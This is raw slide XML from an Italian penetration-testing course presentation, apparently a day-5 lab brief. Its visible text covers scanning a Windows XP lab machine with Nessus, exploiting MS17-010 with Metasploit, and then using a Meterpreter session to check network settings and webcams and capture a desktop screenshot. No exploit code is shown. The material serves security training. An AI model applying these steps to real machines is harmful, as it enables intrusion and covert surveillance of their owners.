                    <a:pt x="3489122" y="7016"/>
                    <a:pt x="3490660" y="10730"/>
                    <a:pt x="3490660" y="14603"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3490660" y="2261664"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3490660" y="2269729"/>
                    <a:pt x="3484122" y="2276267"/>
                    <a:pt x="3476057" y="2276267"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="14603" y="2276267"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6538" y="2276267"/>
                    <a:pt x="0" y="2269729"/>
                    <a:pt x="0" y="2261664"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="14603"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="10730"/>
                    <a:pt x="1539" y="7016"/>
                    <a:pt x="4277" y="4277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7016" y="1539"/>
                    <a:pt x="10730" y="0"/>
                    <a:pt x="14603" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 8" id="8"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-47625"/>
              <a:ext cx="3490660" cy="2323892"/>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3908993" y="5077050"/>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2"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="-2051378" y="3236663"/>
            <a:ext cx="9146584" cy="5246370"/>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0" r="0" b="-139600"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 16" id="16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076046" y="4691551"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8057145" y="6635288"/>
            <a:ext cx="8024194" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="flat" w="9525">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" len="sm" w="sm"/>
            <a:tailEnd type="none" len="sm" w="sm"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="6984667" y="2084316"/>
            <a:ext cx="7803676" cy="6457782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>1 - LABORATORIO VIRTUALE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.1 - Configurazione Macchina Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.2 - Configurazione Macchina Windows XP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    1.3 - Verifica Comunicazione Macchine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Light"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>2 - VULNERABILITY SCANNING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    2.1 - Scan con Nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    2.2 - Basic Scan con Nessus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>3 - FASE DI EXPLOIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.1 - Panoramica Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.2 - Sfruttamento Vulnerabilità MS17-010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    3.3 - Fase di Test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce Bold"/>
              </a:rPr>
              <a:t>4 - CONSIDERAZIONI FINALI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2004">
                <a:solidFill>
                  <a:srgbClr val="555555"/>
                </a:solidFill>
                <a:latin typeface="Open Sauce"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3006"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4312674" y="875982"/>
            <a:ext cx="12689927" cy="886461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5920"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="8000" spc="-728">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>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Freeform 21" id="21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12466671" y="4691551"/>
            <a:ext cx="4094226" cy="4114800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4114800" w="4094226">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4094226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40942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2590327" y="950176"/>
            <a:ext cx="5511612" cy="738072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6043"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4317">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>INDICE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 23" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="12080162" y="1531102"/>
            <a:ext cx="5511612" cy="440891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3523"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2517">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>GIORNO 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="868292" y="9706610"/>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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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472290" y="1344889"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="4294297"/>
            <a:ext cx="15381560" cy="3406776"/>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1.0 - Configurazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Laboratorio </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="9099"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6499">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Virtuale</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120324">
            <a:off x="7096896" y="2508125"/>
            <a:ext cx="10252476" cy="9509171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="9509171" w="10252476">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10252476" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10252476" y="9509171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9509171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="2296042" y="3741120"/>
            <a:ext cx="3925100" cy="7766485"/>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6" id="16"/>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7" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14690529" y="296020"/>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8" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1453220" y="239020"/>
            <a:ext cx="14768151" cy="1779290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" spc="-546">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>EXPLOIT SU WINDOWS XP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="0" indent="0" lvl="0">
              <a:lnSpc>
                <a:spcPts val="4440"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6000" spc="-546">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic"/>
              </a:rPr>
              <a:t>CON METASPLOIT </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1107704" y="2204936"/>
            <a:ext cx="15381560" cy="688974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>TRACCIA - GIORNO 5 :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="700026" y="6619294"/>
            <a:ext cx="7384659" cy="1967230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Kali Linux: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.200.100 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>IP Metasploitable: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>192.168.200.200</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" marL="604523" indent="-302261" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3920"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Listen Port: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>7777</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 21" id="21"/>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2" id="22"/>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3" id="23"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="146358" y="3118637"/>
            <a:ext cx="17676615" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Si richiede allo studente di: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Effettuare un Vulnerability Scanning (basic scan) con Nessus sulla macchina Windows XP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="4199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
                <a:ea typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>● Sfruttare la vulnerabilità identificata dal codice MS17-010 con Metasploit.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1107704" y="6124630"/>
            <a:ext cx="5642843" cy="596900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Requisiti laboratorio:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 25" id="25"/>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6" id="26"/>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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9275739" y="5334986"/>
            <a:ext cx="7384659" cy="3923314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="700"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Evidenze laboratorio Giorno 5:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> Una volta ottenuta una sessione Meterpreter, eseguite una fase di test per confermare di essere sulla macchina target. Recuperate le seguenti informazioni: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>1) Se la macchina target è una macchina virtuale oppure una macchina fisica ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>2) le impostazioni di rete della macchine target ; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>3) se la macchina target ha a disposizione delle webcam attive. Infine, recuperate uno screenshot del desktop.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="d"/>
  </p:transition>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730615"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2753760" y="33924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8" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
